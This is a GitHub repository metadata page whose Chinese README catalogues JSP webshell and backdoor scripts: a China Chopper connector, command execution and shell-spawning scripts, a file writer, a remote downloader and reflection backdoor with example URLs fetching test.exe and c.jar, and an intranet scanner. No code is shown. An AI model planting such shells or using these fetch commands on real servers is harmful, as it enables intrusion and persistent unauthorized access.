https://github.com/jearyorg/jsp
https://github.com/jearyorg/jsp
Last synced: 4 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/jearyorg/jsp
- Owner: jearyorg
- Created: 2015-11-09T06:56:09.000Z (about 10 years ago)
- Default Branch: master
- Last Pushed: 2015-11-10T05:52:11.000Z (about 10 years ago)
- Last Synced: 2024-08-05T17:27:32.168Z (over 1 year ago)
- Language: Java
- Size: 0 Bytes
- Stars: 25
- Watchers: 4
- Forks: 26
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - jearyorg/jsp - (Java)
README
# JSP常用脚本
##
chopper.jsp
菜刀连接脚本
cmd.jsp
无回显执行命令(弹shell)
cmdpass.jsp
回显带密码执行命令
file.jsp
写文件脚本,格式:file.jsp?f=test.jsp&t=test
down.jsp
下载文件到网站目录,格式:down.jsp?u=http://test.com/test.exe
reflect.jsp
反射后门,配合c.jar使用,格式:reflect.jsp?u=http://test.com/c.jar pass=023 (form:yzmm)
c.jar
其实代码和chopper差不多,可自行使用JDGUI查看
netspy.jsp
内网探测脚本2.0(form:jeary-[zone](http://zone.wooyun.org/content/23517))